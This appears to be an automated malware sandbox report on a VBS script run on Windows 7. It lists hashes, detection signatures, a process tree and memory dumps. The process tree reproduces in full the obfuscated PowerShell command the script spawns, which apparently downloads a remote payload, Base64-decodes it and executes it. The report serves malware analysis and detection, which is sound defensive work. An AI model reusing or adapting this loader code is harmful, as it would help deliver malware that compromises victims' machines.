Overview

overview

10

Static

static

1

e4c5f96a9f...5b.vbs

windows7-x64

8

e4c5f96a9f...5b.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    22/10/2024, 01:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e4c5f96a9fbb32b0754fba2c4bd4a3773a77d8018b7aa5d572b067777de7165b.vbs

  • Size

    26KB

  • MD5

    1c78cc71bf8db131a33f156feff9ec4d

  • SHA1

    af06e517411ac017868488d8a7173bb2d5d98012

  • SHA256

    e4c5f96a9fbb32b0754fba2c4bd4a3773a77d8018b7aa5d572b067777de7165b

  • SHA512

    868f20c758607c5e98310a437eb621246928564936ab6fb311f825ec0554b1181eacbddd9335b897fe85e488fc2feba69009a5f5c5539a76f605c22ae5948a32

  • SSDEEP

    384:XrCiX5aUO2sEZovx4IhH4iwTrUtngui1/92lP8oyrZsqfQAU:Xe+pvyl4vT4o3/rm

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4c5f96a9fbb32b0754fba2c4bd4a3773a77d8018b7aa5d572b067777de7165b.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\System32\ping.exe
      ping gormezl_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:2636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2840

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab4D28.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • memory/2840-20-0x000007FEF688E000-0x000007FEF688F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2840-21-0x000000001B710000-0x000000001B9F2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2840-22-0x0000000001BE0000-0x0000000001BE8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2840-23-0x000007FEF65D0000-0x000007FEF6F6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2840-24-0x000007FEF65D0000-0x000007FEF6F6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2840-25-0x000007FEF65D0000-0x000007FEF6F6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2840-26-0x000007FEF65D0000-0x000007FEF6F6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2840-27-0x000007FEF688E000-0x000007FEF688F000-memory.dmp

    Filesize

    4KB

    Download